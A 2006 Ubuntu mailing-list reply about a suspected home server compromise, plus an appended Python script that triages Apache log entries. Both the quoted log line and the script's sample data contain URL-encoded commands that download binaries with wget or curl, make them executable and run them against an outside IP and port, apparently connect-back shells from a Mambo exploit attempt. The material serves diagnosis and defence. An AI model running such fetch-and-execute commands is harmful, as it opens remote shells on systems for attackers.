Re: My home desktop was compromised, but how?



On Tue, 2006-02-28 at 15:44 -0500, Carthik Sharma wrote:
> Somebody seems to have hacked into my desktop/server. I find files in
> the /tmp/ (like "agent.8213") directory which I cannot open, these are
> setuid-ed -- how do I open these?

These may very well be normal; many applications place things in /tmp.

Try sudo ls /tmp/agent.8213 to see the contents

> In my apache access logs, there are things like
> "http://66.98.144.89/cmd.txt?&cmd=cd%20/tmp;wget%
> 20216.99.218.183/cback;chmod%20744%20cback;./cback%20217.160.242.90%
> 208081;wget%20216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt
> %20217.160.242.90%208081;cd%20/var/tmp;curl%20-o%20cback%
> 20http://216.99.218.183/cback;chmod%20744%20cback;./cback%
> 20217.160.242.90%208081;curl%20-o%20dc.txt%
> 20http://216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt%
> 20217.160.242.90%208081;echo%20YYY;echo|"
>
> That above is a valid url, and will take you to a script to deface
> someone's php script etc, I suppose. Now, how did this malicious
> hacker get in my computer?

That is just an attempt to deface a Mambo site. If you don't use Mambo:
don't worry (anyone can request any weird-looking URL on your server,
and it'll end up in your log). If you do run Mambo: make sure you're up
to date.
--
Dennis K.
- Linux for human beings - http://www.ubuntu.com
- Linux voor normale mensen - http://www.ubuntu-nl.org


--
ubuntu-users mailing list
ubuntu-users@xxxxxxxxxxxxxxxx
https://lists.ubuntu.com/mailman/listinfo/ubuntu-users
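
An added example, not part of the original thread: one way to triage access-log entries like the one quoted above, by decoding the request, reading the response status, and listing the files the embedded command would have left in /tmp or /var/tmp. The sample log lines, their documentation-range addresses and the "path" parameter name are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Apache common/combined log prefix: host ident user [time] "METHOD target ..." status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3}) ')
SHELL_RE = re.compile(r'\b(wget|curl|chmod|perl)\b')

def dropped_paths(command):
    """Follow 'cd' and 'chmod' steps to list the files the command tried to create."""
    cwd, paths = '', []
    for step in command.split(';'):
        words = step.split()
        if len(words) == 2 and words[0] == 'cd':
            cwd = words[1]
        elif len(words) == 3 and words[0] == 'chmod':
            paths.append(f'{cwd}/{words[2]}' if cwd else words[2])
    return paths

def triage(line):
    """Return a finding for a request carrying shell commands in cmd=, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, _method, target, status = m.groups()
    cmd = re.search(r'[?&]cmd=(.*)', unquote(target))
    if not cmd or not SHELL_RE.search(cmd.group(1)):
        return None
    # 4xx: the server refused the request or the target does not exist, so the
    # log entry is all that happened. Any other status means a handler answered;
    # that alone proves nothing, so check the listed paths on disk.
    return {'client': client, 'status': int(status),
            'investigate': not 400 <= int(status) < 500,
            'check': dropped_paths(cmd.group(1))}

# Constructed sample lines: documentation-range addresses, made-up "path" parameter.
REQ = ('GET /index.php?path=http://192.0.2.10/cmd.txt?&cmd=cd%20/tmp;'
       'wget%20192.0.2.10/cback;chmod%20744%20cback;cd%20/var/tmp;'
       'curl%20-o%20dc.txt%20http://192.0.2.10/dc.txt;chmod%20744%20dc.txt HTTP/1.0')
SAMPLE = [
    f'203.0.113.5 - - [28/Feb/2006:03:12:45 -0500] "{REQ}" 404 209',
    '198.51.100.7 - - [28/Feb/2006:03:15:02 -0500] "GET /index.html HTTP/1.0" 200 1043',
    f'203.0.113.9 - - [28/Feb/2006:04:01:10 -0500] "{REQ}" 200 5120',
]

if __name__ == '__main__':
    for entry in SAMPLE:
        finding = triage(entry)
        if finding:
            print(finding)
```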